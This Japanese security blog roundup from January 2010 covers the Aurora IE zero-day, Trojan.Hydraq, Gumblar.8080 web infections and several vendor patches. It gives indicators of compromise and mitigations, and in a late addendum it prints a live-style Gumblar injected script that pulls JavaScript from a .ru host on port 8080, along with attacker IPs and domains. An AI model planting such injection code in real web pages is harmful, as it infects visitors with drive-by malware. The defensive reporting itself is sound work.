Warner shared evidence with krebsonsecurity.com that one of China’s most-visited anime sites was recently hacked and seeded with the Aurora exploit, serving those who visited with IE6 a Trojan that dropped at least 32 different malicious programs, including password stealers and tools used to enlist infected PCs in coordinated, distributed cyber attacks.
最近、中国のサイトからアニメを落とした方、心当たりはありませんか？（苦笑）

Microsoft January Out of Band Patch
MicrosoftがIE用の修正パッチを臨時公開へ、中国発の攻撃に対応
Patch Released for Recent Microsoft Zero Day (CVE-2010-0249)
New IE Zero-Day Exploit Attacks Continue

続く
----------
Trojan Hydraq
リモートから権限奪取する機能をもった Operation Aurora(aka Hydraq)ですが、シス管の皆様方には心臓に悪いVideoが公開されています。
The Hydraq VNC Connection
Once Trojan.Hydraq is installed by means of an exploit, it downloads additional files from a remote location to aid with the attack. Two of the additional files downloaded are named VedioDriver.dll and Acelpvc.dll. These files are placed into the %System% folder on the exploited computer.
The Hydraq VNC Connection
本当に心臓に悪い・・・

感染のチェックは以下のファイルの存在（しちゃだめ！）を確認してください
How Can I Tell if I Was Infected By Aurora?
チェックサムはMD5
securmon.dll:
E3798C71D25816611A4CAB031AE3C27A
Rasmon.dll:
0F9C5408335833E72FE73E6166B5A01B
a.exe:
CD36A3071A315C3BE6AC3366D80BB59C
b.exe
9F880AC607CBD7CDFFFA609C5883C708
AppMgmt.dll
6A89FBE7B0D526E3D97B0DA8418BF851
A0029670.dll
3A33013A47C5DD8D1B92A4CFDCDA3765
msconfig32.sys
7A62295F70642FEDF0D5A5637FEB7986
VedioDriver.dll
467EEF090DEB3517F05A48310FCFD4EE
acelpvc.dll
4A47404FC21FFF4A1BC492F9CD23139C

SyamntecはZeuSとの関連を示唆していますが、もしZeuS系がこれを知ってたら速攻で現在のキャンペーンに組み込んだことでしょう・・そうならなかったことだけが救いなのかな？

もうすこし続く
----------
Microsoft KNEW ZERO-DAY

Microsoft knew of IE zero-day flaw since last September
Microsoft Knew of IE Zero-Day Flaw Since September
Microsoft today admitted it knew of the Internet Explorer flaw used in the attacks against Google and Adobe since September last year.
あらあら・・
"Customers would have to open a malicious file to be at risk of exploitation," Microsoft's Bryant said, urging users to disable ActiveX controls in Microsoft Office.

まさか Google相手だしほったらかしておいたとか・・？
そんなことは～無いですよねぇ～？ > バルマー氏

[MS10-002] Internet Explorer 用の累積的なセキュリティ更新プログラム (978207)(再掲)
マイクロソフトにご協力いただき、Internet Explorer 6 のお客様に対する限定的な標的型攻撃の詳細を提供してくださった下記の企業に対し、マイクロソフトは深い謝意 を表します。
•Google Inc. および MANDIANT
•Adobe
•McAfee
•フランス政府 CSIRT CERTA

----------
Microsoft Another ZERO-DAY
Windows カーネルの脆弱性 (アドバイザリ 979682)
小野寺です。
Windows カーネルに関連する特権の昇格の脆弱性情報が一般に公開されました。現在調査を行っていますが、現時点では、16bitアプリケーションの互換性を確保するための機能部分が影響を受けることが分かっています。そのため、影響を受けるのは、32bit版Windowsとなり、64bit版は影響を受けません。
回避策を有効にする:
reg ADD "HKLM\System\CurrentControlSet\Control\WOW" /v DisallowedPolicyDefault /t REG_DWORD /d 1

New Microsoft Advisory: Vulnerability in Windows Kernel Privilege Escalation (CVE-2010-0232)
But be aware that there is a reason for this feature: Some old (very old) applications do require 16 bit support.

ちなみに、64bit版に影響がない根拠は
NT以降の全ての32ビットWindowsバージョンでユーザー権限昇格を許すバグが見つかる
64-bit用のWindowsでは最初から16-bitアプリを一切実行できない(MSDOS/WOWEXECサブシステム自体がそもそも存在しない)。
ということです。
このVDM用のコードを使うと、権限を持たないユーザーでも任意のコードをシステムのカーネルに挿入できる。つまり、OSの最もビンカンな所に変更を加えられる。
何だかアレゲすぎる脆弱性ですよね・・・

影響を受ける人：
Microsoft脆弱性
というか、何ですかそのボリューム名(0dayWAREZ)は・・・・

最強の運賃計算ツール、mars.exe [swa.gr.jp]がいまだにDOSアプリです。
Windows 3.1 時代のエロゲとか。
なるほど納得・・・・

Windowsの脆弱性は32ビット版のみに影響、MSがアドバイザリー公開

私もチキンなので、速攻で倒しましたよ (at 64bit Win7)

----------
PPDF spreading fast
PoisonedPDFの拡散が激しくなっています。
「Operation Aurora」をエサにした標的型攻撃
だから、レポートとかをPDFで頒布するのはもうヤメましょうよ・・・
※じゃ何がいいんだ！？って言われると困るわけですが・・・

Targeted Email Examples Relating to Microsoft Internet Explorer 0-day CVE-2010-0249
MSも、せめて今回のパッチに Adobe Readerの脆弱性チェックくらいは入れてもよかったのでは・・・

Adobe Reader 9.3.0
どうしても 8.2 ぢゃないとイヤという駄々っ子へ
http://ardownload.adobe.com/pub/adobe/reader/win/8.x/8.2/jpn/AdbeRdr820_ja_JP.msi

----------
Mozilla release and update

Released:
Firefox 3.6

Updated:
Thunderbird 3.0.1
Thunderbird 3.0.1 で修正済み

管理者モードで起動しないと通知すら来ないのは問題ですね・・・

----------
穴ぼこっ

Rockwell Automation Allen-Bradley MicroLogix PLC に複数の脆弱性
PLC が設置されているネットワークにアクセス可能な第三者によって、PLC の設定を変更されたり、サービス運用妨害 (DoS) 攻撃を受けたりする可能性があります。
2010年1月20日現在、対策方法はありません。
solution: PLC が設置されているネットワークへのアクセスを制限する

IBM Lotus Domino Buffer Overflow Vulnerability 3
Unpatched: Restrict network access to the LDAP service.

Cisco IOS XR SSH Denial of Service Vulnerability 2
update to fixed virsion:
Cisco Security Advisory: Cisco IOS XR Software SSH Denial of Service Vulnerability

----------
ガンブラー™

Symantec:
Gumblar Botnet Ramps Up Activity
だから、あなたのとこは、Gumblar.xとGumblar.8080(新種）のどっちの「ブロック」の話をしてるのか明確にしなさいってば
直近の日がハネあがってたので気になったけど・・・・
According to Wikipedia, sites become infected using passwords obtained from site admins. The host site will access a website via FTP and infect the website.
(Virusビヘイビアの）ソースをWikipediaに頼るのですか、そうですか・・・

TrendMicro:
SASFIS Fizzles in the Background
SASFIS variants usually be downloaded while visiting sites that have been compromised using the Eleonore Exploits Pack as a file named load.exe. Upon execution, these create temporary files and modify registry entries. They then attempt to send a GET request to a remote site to download another file usually named max.exe, which will again download another file named max_b.exe, a FAKEAV variant.
というマルウェアネットワークの一種で、アダルトサイトに埋め込まれている、Pay-Par-Installビジネスの一つの形式ってのとは、現行の"Gumblar.8080"（syszyd32.exeさん）とはちょっと違う気もするけど、SecurityToolの画面がどど～んと出てますしね。
複数のベクトルが絡み合って進行してるのかしらん？

どこまで吹かずに耐えられますか？
ガンブラー vs ウイルスセキュリティZERO
あっいつのまにっ
あたりでダメ・・・

命名「Gumblar.8080系」、でもってまた改竄コードが変化
なんということでしょう！
難読化をやめたとたん、ウイルス対策ソフトは検出できなくなってしまいましたｗ

そして、なんということでしょう！
「/*handle exception*/」→「/*Exception*/」

また難読化です。orz
いいように弄ばれています。

まず殴られる、そして相手が殴る、そしてまた殴られる

----------
落穂

オンラインゲームをかたるフィッシング出現、ファンサイトから誘導

Aurora攻撃で株を上げるセキュリティベンダー

Web users still don’t select good passwords
Consumer Password Worst Practices
Rank:1 290,731 user loved -- "123456"

Blackhole DNS Update - rogues, trojans, fastflux domains
rogues, trojans, zbot domains and more to add to your malware blocklist of malware sinkhole:
なんか、nikkei とか mainichi とかあるとおもったら、全部 Gumblar.8080 の ru ドメインでした・・・
※コロコロ変わるので、これは塞いでも意味がありません。

Nmap 5.20 Released

----------
Gumblar.8080
91.121.1.99 AS16276(OVH Paris) *NEW IP
91.121.167.41 AS16276(OVH Paris) *NEW IP
91.121.24.139 AS16276(OVH Paris)
91.121.79.191 AS16276(OVH Paris)
217.23.5.27 AS49981(WORLDSTREAM) Netherlands
これまで無かった OVH 管轄が２つと、WorldStreamが戻ってきました。

----------
Google Safe Browsing
| 1264104014 | B | [goog-black-hash 1.49315 update]
| 1264104001 | M | [goog-malware-hash 1.18802 update]
| 296800 | -855(297655)
| 1266907 |
EoF

Segment #1
疲れた（多分に物理的に）

Segment #2
新カテゴリー誕生
ガンブラーウイルス対策まとめサイト
Gumblar.8080系
こ・・この発想(tar)はなかった orz

"とある^-^"プロキシサーバについて調査を行いました。"幸いなことに^-^;"、プロキシサーバの手前で、パケットキャプチャしていたデータが残存していたため、今回のスクリプトコードの書き換えが判明しました。
だ、だめだ、・・脱力・・・

設立趣意書
ぜひ、このテイストで続けてってください（笑）

日本のセキュリティの未来は明るい（違った意味で）

Segment #3
百度、米国のドメイン登録会社を提訴
絶対やってくれると信じてましたよ・・・・
誰かこの件で逆告訴してくれないかな・・
deny from 121.8.0.0/13
deny from 123.112.0.0/12
deny from 220.160.0.0/11
&おまけ
deny from 61.247.192.0/19 (Yeti aka Naver)
deny from 202.131.24.0/21 (Yeti aka Naver)
via : ロボ避けとアクセス制限のための覚え書き

Segment #4
「Boot Camp 3.1」で64ビット版Windows 7を試してみた
結果を先に書くと、Mac OS XとWindowsでは、Magic Mouseで提供される機能に大きな開きがある。まず、ボディ表面を指でなぞるスクロールは可能だが、360度ではなく上下方向しか動かない。また、 Mac OS Xではスクロール機能がデフォルトで慣性スクロールになっているが、これもサポートしていないようだ。1画面に収まらないページを閲覧する際に、マウスを指ではじくと画面がスルスルとすべり、指で押さえるとピタっと止まる心地よさは味わえない。2本指を使ったスワイプもできなかった。ただ、 control＋スクロールでの画面の拡大／縮小は機能していた。
ざ・・ざんねん・・・orz

Segment #5
Firefox＞セキュリティ
無駄なあがきです。
此岸から手招きしておこうっと（笑）

追記：
Segment #65535
Gumblar.8080系の攻撃手法が変化し、従来のシグネチャをまたも回避・・・・
＜script＞ try{window.onload=function(){newEl = document.createElement('script');newEl.setAttribute('defer', '1');newEl.setAttribute('src', 'http://blogger-com.fandango.com.charter-net.authentictype・ru:8080/live.com/live.com/sina.com.cn/nhl.com/google.com/');document.body.appendChild(newEl);} } catch(T97uvnk9p ) {/*handle exception*/}＜/script＞
＜!--bf3885d6a0c53563f5c70fc18114aaad--＞
鼬が一匹、鼬が二匹、鼬が・・・・・・

古い .ru ドメインが一掃された模様です。
EoF

ライバルが手を結ぶ日
慶応2年1月21日（旧暦。新暦では1866年3月7日）、坂本竜馬らの仲介により長州藩と薩摩藩が薩長同盟を結んだ。
料理番組の日
1937年のこの日、BBCが世界初の料理番組「夕べの料理」を開始したことにちなむ。
と、なってますけど、英語版wikipediaにすら項目がないほど不明な番組・・・(refer: 世界初の料理番組とされるイギリスＢＢＣの「夕べの料理」･･･その番組の詳しい内容・写真資料などに関する情報を探しています。
日本テレビ系全国ネットで「キユーピー3分クッキング」放送開始。
聖アグネスの祝日 (304年)

----------
ソバ屋遅延
Internet Explorerのセキュリティ更新の事前告知 (定例外)
小野寺です。
「Internet Explorer 6の悪用事例を確認 (セキュリティ アドバイザリ 979352)」でお伝えしている脆弱性に対応する更新プログラムを2010/1/22にリリースします。
余裕が消し飛んだ様子・・・

Advance Notification for Out-of-Band Bulletin Release
We will be releasing MS10-002 tomorrow, January 21st, 2010. We are planning to release the update as close to 10:00 a.m. PST (UTC -8) as possible.
01/21/10AM PST => 01/22/3AM JSTということで、明日までお待ちください。

これを書いている時点(AM7 JST)ではまだ日本版の更新がありませんが、本家ではアドバイザリ979352にいくつかの修正が入っています。
Data Execution Prevention (DEP) Bypass
The DEP bypass exploit is not, at this time, publicly available and we have not seen it used in attacks.
ASLRで防護されてるから、Vista上では動作してないはず！

Microsoft E-Mail Products That Render using mshtml.dll Protected by Default
There have been reports that supported versions of Outlook, Outlook Express and Windows Live Mail are affected by the vulnerability in Security Advisory 979352.
IEだけじゃなくて、Outlook、Outlook Express そして Windows Live Mailもこの脆弱性をうける・・っと

Other products may also use the HTML rendering engine for Internet Explorer and could expose this vulnerability.Trident系のエンジン使用の製品にも影響があることを初めて認めましたとさ～

Office Applications with Active Scripting Enabled Potentially Vulnerable
We are also aware that the vulnerability can be exploited by including an ActiveX control in a Microsoft Access, Word, Excel, or PowerPoint file. Customers would have to open a malicious file to be at risk of exploitation.
をぃをぃをぃ・・・・

STAY TUNED Microsoft Update !

続くらしい
----------
DEP回避
Reports of DEP being bypassed
Yesterday we heard reports of a commercially available exploit that bypasses DEP. This exploit was made available to a limited number of major security vendors (Antivirus, IDS, and IPS vendors) and government CERT agencies. We wanted to use this opportunity to give an overview of current customer risk related to this DEP bypass.

その、limited number of major security vendorsといわれた Vupenですが
Internet Explorer 0-Day - DEP Does Not Prevent Exploitation
While the public exploit only targets Internet Explorer 6 without DEP (Data Execution Prevention), VUPEN Security has confirmed reliable code execution with Internet Explorer 8 and permanent DEP enabled.
Enabling DEP will only protect your systems from public exploits, however, disabling JavaScript is the only way to prevent DEP bypass attacks.
と、自信満々のご様子

他のセキュ会社の反応が鈍いので、もう少し様子見（明日のパッチで解消されるのかどうか）ですかね～

まだ続く
----------
実際の様子（シス管の人は見ないほうがいいかも）
冷や汗出ました

IEのポインタ参照処理の脆弱性（CVE-2010-0249）に関する検証レポート
うひ～
完全にリモートログインされてるぢゃありませんか・・
このリバースパーサ・デーモンの出所はいったい！？

IEのポインタ参照処理の脆弱性（CVE-2010-0249）検証メモ
検証では、脆弱性の存在するターゲットPC（Windows XP SP2 & IE 6）で細工された応答を返すサーバにアクセスすることで脆弱性を利用した攻撃を行い、任意のサーバの任意のポートにコネクトバックさせ、結果、シェルを奪取するというものです。

今後、Gumbelr亜種が、この脆弱性を利用しはじめたりなんかして昨今のGumbler騒ぎに拍車がかからないことを祈っております。
# Gumber騒ぎは個人的にち食傷気味だったりするんですよね。
たぶんわざと・・・typoがあるのはともかく、本気でそう願います。

これは確かにIE/OutLook系の全面使用禁止を打ち出されてもしょうがないですね。

とどめ・・
----------
ぎゃ～す
不特定多数を対象としたMicrosoft Internet Explorerのゼロデイ脆弱性を狙う攻撃【Tokyo SOC Report】
先日、マイクロソフトより公開されたInternet Explorerの新たな脆弱性(*1)を狙う攻撃が不特定多数を対象に行われていることを確認しました。この攻撃は、Webサイト経由で行われています。以下は、攻撃元URLの例です。
ちょっとまった・ちょっとまった・ちょっとまった
1iegoogle.22sys22・cn/pz/au.htm
2iegoogle.22sys22・cn/pz/au.htm
3iegoogle.22sys22・cn/pz/au.htm

IE6使用中のところは、今すぐにでも使用を中止すべきです。
Revisiting the Internet Explorer Security Bug
I had just finished opening an account at the local bank late last week when I happened to catch a glimpse of the bank manager’s computer screen: He had about 20 Web browser windows open, and it was hard to ignore the fact that he was using Internet Explorer 6 to surf the Web.
For more than a second I paused, and considered asking for my deposit back.
うはははは

Govt issues IE security warning
オーストラリア政府も

え？まだあるの？
----------
そしてFirefoxへようこそ
German government IE warning leads to spike in Firefox downloads
People in Germany Are Switching Browsers
Operaかと思ってたけど、やっぱり Firefoxなんですね～

Firefoxを導入したら No-script, Firebug, IE_tab あたりは必須でしょうか？
他にもなにかあったら教えてください。
※NoScriptは必ず IFRAMEを禁止にしてください。

Firefox 3.6のリリースは日本時間の1月22日2:00AMを予定
Comming Soon

----------
一方・・16bit(Win3.1)アプリも
こっちはさっさと斬ってしまっていいと思うんですが・・
Windows hole discovered after 17 years - Update
The problem is caused by flaws in the Virtual DOS Machine (VDM) introduced in 1993 to support 16-bit applications (real mode applications for 8086). VDM is based on the Virtual 8086 Mode (VM86) in 80386 processors and, among other things, intercepts hardware routines such as BIOS calls.

XPの場合： 以下をエディタで開いて"vdmdisallow.reg"として保存
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat]

"VDMDisallowed"=dword:00000001
into a file called vdmdisallow.reg and double click the file. Windows will then automatically import the key (admin rights are required to perform this action).

Microsoft investigates 17-year-old Windows flaw

Windowsに新たな未修正の脆弱性、回避策の利用を

----------
しょっくうぇーぶ
Shockwaveってまだ必要なんですか？ほんとに（苦笑）
Security update available for Shockwave Player
Adobe recommends Shockwave Player users uninstall Shockwave version 11.5.2.602 and earlier on their systems, restart their systems, and install Shockwave version 11.5.6.606, available here: Get Shockwave.

Adobe Shockwave Player 3D Model Parsing Eight Vulnerabilities 4
８ですか・・
Security Bulletin - Adobe Shockwave Player
Adobe Releases Shockwave Player Update
Adobe fixes critical holes in Shockwave
Critical flaws haunt Adobe Shockwave Player

----------
Zero-DayのApple
もう一方のZERO-DAYの雄（笑）
セキュリティアップデート 2010-001 について
なんか、知らないのまで増えてるし・・

Apple Releases Security Update 2010-001
アップル、Mac OS X用「セキュリティアップデート2010-001」を公開
Apple Mac OS X Security Update Fixes Multiple Vulnerabilities 4
Apple Security Update 2010-001
Mac OS Xにパッチ、12件の重大なセキュリティホールを修正
Apple releases Security Update for Mac OS X

----------
まだまだっ（A PIT)

RealPlayer Multiple Vulnerabilities 4
またですか・・
Update to the latest version.

BIND 9 の DNSSEC 検証コードに脆弱性
遠隔の第三者によって、不正な NXDOMAIN レコードをキャッシュに追加される可能性があります。
BIND 9 DNSSEC validation code could cause bogus NXDOMAIN responses
ISC BIND DNSSEC CNAME / DNAME and NXDOMAIN Cache Poisoning Vulnerabilities 2

Pidgin MSN <= 2.6.4 File Download Vulnerability
Fixed in Pidgin 2.6.5 Update to the latest version.

----------
LGPL?
/*LGPL*/ infected files Clean-up/removal script
アンタノトコが ガンブラー™を主張したんだから最後まで責任取りなさいよね～
用語混乱させた責任は重いぞ～（笑）

というか、こんな怪しげな(hosted : possible.in) Script Cleanerなんか誰がつかうっていうんだか・・
堂々と Symantecの中にホストしなさいよ～
※出所不明の実行ファイルをダウンロードしてはいけません。

だいたい・・Scriptだけ削除してそれで再開できるほど甘いマルウェアじゃないことくらいそろそろ判ってるはず・・・
だけど、本気でわかってないのかしらん？
（まだCVE-2009-4324関連シグネチャはBloodHoundの状態）

LACさんも余裕ありげだけど・・
新春早々の「Gumblar一問一答」
JSOCのお客様でも感染被害やホームページ改ざん被害が継続しており、新年早々のんびりはできないようです。
ふ～ん
WAFで止めることはできますか？
NO!
ふ～ん

Tripwireを導入する
Tripwireによるホスト型IDSの構築
こっちのほうが役にたつかもですね～（重いけど）

しかし、セキュ会社がこれじゃ、今後が思い遣られますね・・・(嘆息）

微妙に続く
----------
失敗
「安全なウェブサイトの作り方　改訂第4版」を公開
～ ウェブアプリケーションに脆弱性を作り込んでしまった「失敗例」を拡充 ～

また新たに、WAF（Web Application Firewall）(*9)の活用に関して、WAFの動作原理、WAFの使用が有効な状況、導入検討における留意点を第2章に追記しました。
上で思いっきり否定されてますが・・・

----------
その他
時間切れですよ・・

iPhish - fake iPhone warranty steals info

Yahoo!フィッシング～容疑者グループ逮捕で偽サイト激減、今後の注意点は？

Operation Aurora (Deep Insight):
CVE-2010-0249 in the wild - xx222.8866.org and others – part 0 -- extraexploit

OpenLDAPからActive Directoryへ移行せよ――（1）
Active Directoryなら管理作業が楽になる！
！？

Using Curl to Retrieve Malicious Websites
cURL as cURL
Curlかと思ったのは内緒

----------
睡魔
ガンブラー vs 睡魔
ちなみに今日、とあるホームページを管理している係の人と話す事があったので
「最近こういうウイルスが流行ってるので～」
と忠告しといたんですが
「へー」と「ふーん」と「ほー」と「あ、そうなんですか」という返事しか返ってきませんでした。

ああ・・でじゃぶ・・

----------
8080
91.121.4.99 AS16276(OVH Paris)
91.121.7.26 AS16276(OVH Paris)
91.121.88.218 AS16276(OVH Paris)
94.23.206.229 AS16276(OVH Paris)
82.98.231.25 AS8455(ATOM86)
おかえりなさい > ATOM86

----------
Google Safe Browsing
| 1264017622 | B | [goog-black-hash 1.49243 update]
| 1264017607 | M | [goog-malware-hash 1.18778 update]
| 297655 | -268(297923) 減ってる減ってる・・
| 1264174 |
EoF

[ATTENTION]
Security Advisory 979352 – Going out of Band
We will provide the specific timing of the release tomorrow.
*clap* *clap* *clap*


致命的な障害をほぼ１ヶ月放置した某泥の会社にも見習って欲しいですね


Based on our comprehensive monitoring of the threat landscape we continue to see very limited, and in some cases, targeted attacks. To date, the only successful attacks that we are aware of have been against Internet Explorer 6.
これもまた、実際のトコでしょう。広範に出回っているDrive by download（ガンブラー™ ©Symantec）に悪用されている形跡もいまのところなく、スピア型攻撃としては非常にタイトな印象を受けます。
MS to issue emergency patch for potent IE vuln
Microsoft confirms plan to release out-of-band IE update

----------
二十日正月
玉の輿の日
1905年のこの日、アメリカの実業家J・P・モルガンの甥のジョージ・モルガンが祇園の芸妓・お雪と結婚した。お雪は「日本のシンデレラ」と呼ばれたが、その人生は平坦なものではなかった。
海外団体旅行の日
1965(昭和40)年、日本航空が海外団体旅行「ジャルパック」を発売し、海外団体旅行がブームとなった。

----------
さて・・ソバの出前は出たわけですが・・
インジェクション

Additional information about DEP and the Internet Explorer 0day vulnerability
このDEPというキーワードが非常にわかりにくく、一般の人に 「DEP ONにしてね」といっても「？？」で終わってしまうでしょう。

特にハードウェアNX（ハードDEP)を持たないプロセッサでいくらソフトウェアDEPをONにしたところで、効果は薄く、今回のような heap spray攻撃にはあまり役に立たないと考えられています。
古いPCを古いOSで古いブラウザのまま使用している環境が危険なのは今に始まったことではないわけで・・・
車検ではありませんが、古いPC/OSを使い続けるリスクをどこかが（IPA?)説かない限り、こうしたインシデントが繰り返されるでしょう。また、古い端末を「(WAN外部に)接続させないから安全」とタカをくくっていると、Conficker wormに内側から侵蝕された惨劇の記憶はまだ風化していないはずです。


結論
だから Windows7 を安くしてね（ちょっと違）


オフィス用途で Web Browserと Officeだけ動けばいいのでしたら、 Linux + OpenOffice 環境も視野にいれてみてはいかがでしょうか？（難しいカナ、やっぱり）
参考（技術検証）
New Internet Explorer 0-day Vulnerability and Targeted Attacks
The Trojan.Hydraq Incident
This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq.
IE Zero-Dayがメインベクトルじゃなかったって？
In addition to this, we know that one of the components of this Trojan is based on the code of VNC (Virtual Network Computing, an open source remote desktop access application) and this component has the ability to stream a live feed of a desktop to a remote computer. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user.
Google(CN)って、VNC(もどき）をインストールされて Outgoing 監視にひっかからなかったのか！？
ザルですか？　そうですか
An Insight into the Aurora Communication Protocol
As you can see this attack involved very advanced methods with several pieces of malware working in concert to give the attackers full control of the infected system, at the same time it attempts to disguise itself as a common connection to a secure website. This way the attackers were able to covertly gather all the information they wanted without being discovered.
バックドアってレベルじゃないんですが・・（苦笑）

なんか、聞けば聞くほど、ほんとにコレが Google を含む３０数社のセキュリティ・ポリシーを潜り抜けて発生したという事態そのものが信じられないんですけど・・・

ねぇ・・
Googleを狙った中国のサイバー攻撃、内部に協力者の可能性も

----------
DEPは有効になったけど・・？
Microsoft Internet Explorer Use-after-free Code Execution Exploit (MS 979352)
えと・・DEP回避されたらイミナイじゃないですか！？
Vupenは登録しないとPoC配布されないので、なんとも・・

Hole in Internet Explorer: Good news and bad news
Microsoft readies emergency IE patch to counter public exploits
1:45 PM Jan 18th -- dinodaizovi
And now my Aurora exploit works on IE7 on Vista as well as IE6, IE7 on XP. Remember kids, DEP is useless if the app doesn't opt in.

The IE saga continues, out-of-cycle patch coming soon
SANSの解析を待ちますか

----------
This is not a good month for Microsoft
追い討ちをかけるように
Priviledge escalation exploit
In a posting to a public mailing list, Tavis Ormandy disclosed a zero day privilege escalation vulnerability in the Windows kernel. All versions of Windows, starting with Windows NS 3.1 up to including Windows 7, are affected.

権限昇格系の問題ですね。
The vulnerability affects support for 16 bit applications. In most cases, it is safe to turn off support for 16 bit applications.
16bitアプリっていまどき何かありますっけ？（苦笑）

回避策：
XP Professionalでの グループ・ポリシーエディタによる 16ビットアプリ実行を防止する方法：
Windows XP Policy Demonstration

This is not a good month for Microsoft.
1/13頃までは、実に優雅な１月（のようなふり）でしたよ？
2010年1月13日のセキュリティ情報 (月例)

----------
いまごろ
ガンブラー™(© Symantec) の登場によってワケワカメになってる最近のDrive by Download 事情ですが、
Inside Gumblar: Looking for the trigger
こっちは Gumblar.x(© Kaspersky)の解析結果です。
Gumblar.xのほうは、C&CとInjectorが完全に停止しているので、壊れたスプリンクラーよろしく制御不能になって感染コードを撒き散らしている一部のInfectorを除けば、脅威度は低下しています。

そういえば、さまれぼのExcomp様より、妙な感染サイトの情報を頂いたのですが、これまできちんと「掃除」されていた感染コードが積み重なって延々と記述されている .js の存在が確認できました。これは「感染コードを書き込む」Injectorと、「古い感染コードを掃除する」Infector(Scavenger)が連動して機能していた証拠でもあります（Kasperskyの解析にもありましたネ）

一方、noooo_spam様の解析で、
ウェブ改ざんとsdra64.exe
多重感染させられているサイトに埋め込まれている別インジェクションの最終埋め込み先が、なんとなくZeuS系っぽい感じですね。
検体入手してないので断言は避けますが、直近の感染報告にはコレがありました。
Troj/Zbot-LK

steggba・com AS29182(ISPSYSTEM)
mangasit・com AS49544(INTERACTIVE3D)
あたりと同じなのかな～
今日のMDLに恐ろしい数が登録されています
search = iframe

いずれにせよ、ZeuS系のFast-Fluxコントローラは追うだけムダなのでやめました（苦笑）

----------
なんとなく怪しげな穴

Microsoft Windows Defender ActiveX Heap Overflow PoC
#tested on :[windows 7]
Verified no

Foxit Reader v3.1.4.1125 ActiveX Heap Overflow PoC
#tested on :[windows 7]
Verified no

OpenOffice ".slk" File Parsing Null Pointer Vulnerability
#Tested Vulnerable Versions:3.1.1 and 3.1.0
Verified YES
出所不明の怪しげな .slk ファイルに注意しましょう。

----------
ん？
ガンブラーから考える「一歩踏み込んだ」業務委託先のセキュリティ確保
しかし、今回のガンブラーはコンテンツ作成会社からウイルスをアップロードしてくるのです。これでは信用している人に裏切られたようなものです。

いつのまにか、ビヘイビアが変貌してるきがす・・・

感染源となってるのは、普段Macしか使ってないようなWeb制作会社が BootCampあたりにノーガードでXPを動かしてるケースが多々あるのではないか？と推測してるんですけどね～

----------
8080
217.23.5.27 AS49981(WORLDSTREAM) Netherlands
85.184.10.80 AS8954(INTOUCH) Netherlands
91.121.4.99 AS16276(OVH Paris)
91.121.7.26 AS16276(OVH Paris)
91.121.211.226 AS16276(OVH Paris)
WORLDSTREAMとINTOUCHが初参戦。
INTOUCH(AS8954)は身奇麗（）なのですけどね・・

----------
Google Safe Browsing
| 1263931216 | B | [goog-black-hash 1.49171 update]
| 1263931203 | M | [goog-malware-hash 1.18754 update]
| 297923 | -1065(298988) 順調に漸減してってますが・・
| 1261793 |
EoF

空気清浄機の日
カラオケの日／のど自慢の日
1946年1月19日にNHKラジオで「のど自慢素人音楽会」が開始された
家庭消火器点検の日 1と19で「119」となることから
古い消火器に注意！

----------
WSUS
Windows Server Update Services(WSUS ダブルサス)は、Microsoft社が提供する更新プログラム適用制御用のサーバ・アプリケーションで、限りなくゼロに近い認知度を誇る枯れたソリューションです（笑）。
Microsoft Windows Server Update Services (WSUS)

Secunia integrated with Microsoft WSUS
Secunia Corporate Software Inspector (CSI)
- integrated with Microsoft WSUS for 3rd party Patch Management
お～ *clap* *clap* *clap*

元がサーバ用途なので、一般には相変わらず縁が薄そうですが、この際 PSI のほうも MSのお墨付きをもらって広めて欲しいですね。

----------
PPDF
Poisoned PDF pill used to attack US military contractors
嫌なファイルですね・・・
On-going Targeted attacks against US Military contractors

これ・・去年からしきりに飛び回ってるHinet-TW発の爆弾入りPDFですね
Dec. 28 CVE-2009-4324 Adobe 0-day "consumer welfare table" from gwsm01@gwsm.gov.tw Mon, 28 Dec 2009 22:08:05 +0800 -- contagio
日本の外務省の人(実在するかどうかは？)の名前とかも使われたことがあります。

ペイロードがコロコロ変わっている様子なので気をつけましょう。

対策：
Get Adobe Reader 9.3.0
※MacOS Xユーザは 8.2.0のアップデータを使用すると、一部アプリケーションが使用できなくなります。

----------
IE ZERO DAY ..
Attack on IE 0-day refined by researchers
More on the IE zero day
それにしても、多分にFUD的に騒がれている割には
実害がはっきりしないのですが・・・

エフセキュアの「Exploit Shield」が「Aurora」エクスプロイトをブロック
DarkMarketと今回のIE Zero-dayは無関係だと思うんですけど・・関係あったのかな？
※英語側を見て、コピペミスなのに気が付いた（笑）どんまい～

US to protest against Chinese hacker attacks
ヒラリー氏の側近の話とかまで出る始末なので、うちらパンピーは近寄らないようにしましょう（桑原・桑原）

Further Insight into Security Advisory 979352 and the Threat Landscape
That said, we remain vigilant about this threat evolving and want to be sure our customers take appropriate action to protect themselves. That is why we continue to recommend that customers using IE6 or IE7, upgrade to IE8 as soon as possible to benefit from the improved security protections it offers. Customers who are using Windows XP SP2 should be sure to upgrade to both IE8 and enable Data Execution Protection (DEP), or upgrade to Windows XP SP3 which enables DEP by default, as soon as possible. Additionally customers should consider implementing the workarounds and mitigations provided in the Security Advisory.
XPで SP2以前を使っている方はいろいろな意味で危険です。
Win2Kな人は、もう年貢（バルマー氏へ！）の納め時ですよ～

続く
----------
Bye IE
え？ IE6じゃなくて IEそのもの？
IE vuln linked to attacks on Google, others
The French computer emergency response group Centre d'Expertise Gouvernemental de Réponse et de Traitement des Attaques informatique (CERTA) issued the Jan. 15 advisory. “Le CERTA recommande l'utilisation d'un navigateur alternatif.” [CERTA recommends using an alternate browser.]
ドイツに続いて、フランスも IEを使わないようにとのお達しを出しました。


アンタの国は先に OVH を何とかしなさいよ


この機会に IE6/7 が駆逐できれば、WEB屋はどれほど幸せになれることでしょう（笑）
イヤマテ・・なかなか駆逐できない IE6 の撲滅キャンペーンなのかも（穿ち過ぎ・・・）
After Google hack, Microsoft asks users to abandon IE6, XP

まずは、コレの取り下げから行って欲しいですね
Microsoft: "dropping support for IE6 is not an option"

IE6 Must Die
14,489 - supporters!
意外とすくな・・

----------
SSH攻撃増加中
Uplift in SSH brute forcing attacks
いきなりハネ上がってますね。
In addition to this, our reader Andrew also submitted some analysis of the hit count of some common account names:
1209 root
マテマテマテ・・・

----------
osCommerce
osCommerceは ECサイト構築のOSSソリューションです。日本ではどのくらいのシェアかは不明ですが、そこそこ導入事例があるようですね。

osCommerce Cross-Site Request Forgery and Authentication Bypass -- 2009-01-28 4
Affected:
The vulnerabilities are confirmed in version 2.2 Release Candidate 2a. Other versions may also be affected.
